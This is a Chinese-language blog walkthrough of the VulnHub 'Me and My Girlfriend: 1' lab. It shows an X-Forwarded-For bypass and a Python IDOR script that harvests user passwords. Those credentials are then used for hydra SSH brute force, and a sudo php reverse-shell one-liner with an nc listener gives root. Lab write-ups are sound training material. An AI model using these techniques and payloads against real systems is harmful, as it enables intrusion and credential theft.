Me-and-My-Girlfriend-1

Me-and-My-Girlfriend-1

目录

下载地址:Me and My Girlfriend: 1 ~ VulnHub

1 信息收集

image-20220213122008295

1.1 端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap -sV -T4 -p - 192.168.0.3                 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:54 CST
Nmap scan report for 192.168.0.3
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 后台目录扫描

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.0.3/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

[20:43:35] Starting: 
[20:43:35] 301 -  308B  - /misc  ->  http://192.168.0.3/misc/
[20:43:38] 301 -  310B  - /config  ->  http://192.168.0.3/config/
[20:56:50] 200 -  120B  - /index.php
[20:56:58] 200 -   32B  - /robots.txt
[20:47:35] 403 -  291B  - /server-status

Task Completed

1.2.1 目录分析

  1. 访问http://192.168.0.3/发现有IP限制,查看页面代码信息,发现需要利用X-Forwarded-For Header绕过

    image-20220307205308871

  2. 火狐下载插件:X-Forwarded-For Header,并配置IP地址为:127.0.0.1,请求头选择X-Forwarded-For

    image-20220307215124805

  3. 利用X-Forwarded-For Header插件成功访问到目标网站:http://192.168.0.3/?page=index

    image-20220307214708338

  4. 在目标网站上注册test用户

    image-20220307215906713

  5. 成功登录后台:http://192.168.0.3/index.php?page=dashboard

    image-20220307220148973

  6. http://192.168.0.3/index.php?page=profile&user_id=12页面尝试水平越权,将user_id=12改为user_id=1

    image-20220307215958858

    image-20220307220106909

    # 通过水平越权得到注册的用户信息如下:
Eweuh Tandingan
eweuhtandingan
skuyatuh

  7. 编写脚本尝试获取所有用户的账号密码:

    import requests, re


def get_user_pass(uid):
    uid = uid
    t_url = 'http://192.168.0.3/index.php?page=profile&user_id=%s' % uid
    t_cookie = {
        "PHPSESSID":"ua2kg2n1inkvdbdcohitotsgg5"
    }
    t_headers = {"X-Forwarded-For":"127.0.0.1"}
    getreq = requests.get(url=t_url, cookies=t_cookie,headers=t_headers).text
    # match name
    getname = re.search( "id=\"name\" value=\"(.*?)\">",getreq).group(1)
    # match username
    getusername = re.search( "id=\"username\" value=\"(.*?)\">",getreq).group(1)
    # match passwd
    getpasswd = re.search( "id=\"password\" value=\"(.*?)\">",getreq).group(1)
    return getname,getusername,getpasswd
if __name__ == '__main__':
    for i in range(20):
        getname,getusername,getpasswd = get_user_pass(i)
        if getname:
            print("%s:%s"%(getusername,getpasswd))

  8. 得到以下结果:

    eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
test:Admin123

  9. http://192.168.0.3/robots.txt

    image-20220307214508631

  10. http://192.168.0.3/heyhoo.txt

    image-20220307214435473

2 GetShell

2.1 利用收集的信息尝试ssh登录目标主机

# hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -C user-pass ssh://192.168.0.3

# 得到:ssh登录账号与密码
alice:4lic3
  • -C: FILE 文件格式为 "login:pass"

image-20220309230942710

2.2 成功登录

# 获得第一个flag
alice@gfriEND:~$ cat .my_secret/flag1.txt 
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

3 提权

3.1 尝试提权

sudo su -提权失败

3.2 收集当前系统信息

  1. 查看/etc/passwd

    root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
alice:x:1000:1001:Alice Geulis,1337,+62,+62:/home/alice:/bin/bash
eweuhtandingan:x:1001:1002:,,,:/home/eweuhtandingan:/bin/bash
aingmaung:x:1002:1003:,,,:/home/aingmaung:/bin/bash
sundatea:x:1003:1004:,,,:/home/sundatea:/bin/bash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false

  2. SUID提权:没啥可利用的

    alice@gfriEND:~$ find / -perm -u=s 2>/dev/null
/bin/ping6
/bin/ping
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mtr
/usr/bin/pkexec
/usr/bin/at
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/sudo
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1

  3. 查看当前系统中的用户所创建的文件:没啥东东

    alice@gfriEND:~$ find / -user 1000  2>/dev/null
/home/alice
/home/alice/.bashrc
/home/alice/.cache
/home/alice/.cache/motd.legal-displayed
/home/alice/.bash_logout
/home/alice/.bash_history
/home/alice/.profile
/home/alice/.my_secret
/home/alice/.my_secret/my_notes.txt
alice@gfriEND:~$ find / -user 1001 2>/dev/null
/home/eweuhtandingan
/home/eweuhtandingan/.bashrc
/home/eweuhtandingan/.bash_logout
/home/eweuhtandingan/.profile
alice@gfriEND:~$ find / -user 1002 2>/dev/null
/home/aingmaung
/home/aingmaung/.bashrc
/home/aingmaung/.bash_logout
/home/aingmaung/.profile
alice@gfriEND:~$ find / -user 1003 2>/dev/null
/home/sundatea
/home/sundatea/.bashrc
/home/sundatea/.bash_logout
/home/sundatea/.profile
alice@gfriEND:~$

  4. 查找敏感文件

    alice@gfriEND:/var/www/html$ cat config/config.php 
<?php

    $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html$

  5. 查看当前alice用户是否拥有sudo权限

    alice@gfriEND:~$ sudo -l
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php

3.3 sudo php提权

alice@gfriEND:~$ sudo php -r '$sock=fsockopen("192.168.0.2",2333);exec("/bin/bash -i <&3 >&3 2>&3");'
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 57734
root@gfriEND:~# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:/root#
posted @ 2022-03-10 07:57  f_carey  阅读(62)  评论(0编辑  收藏  举报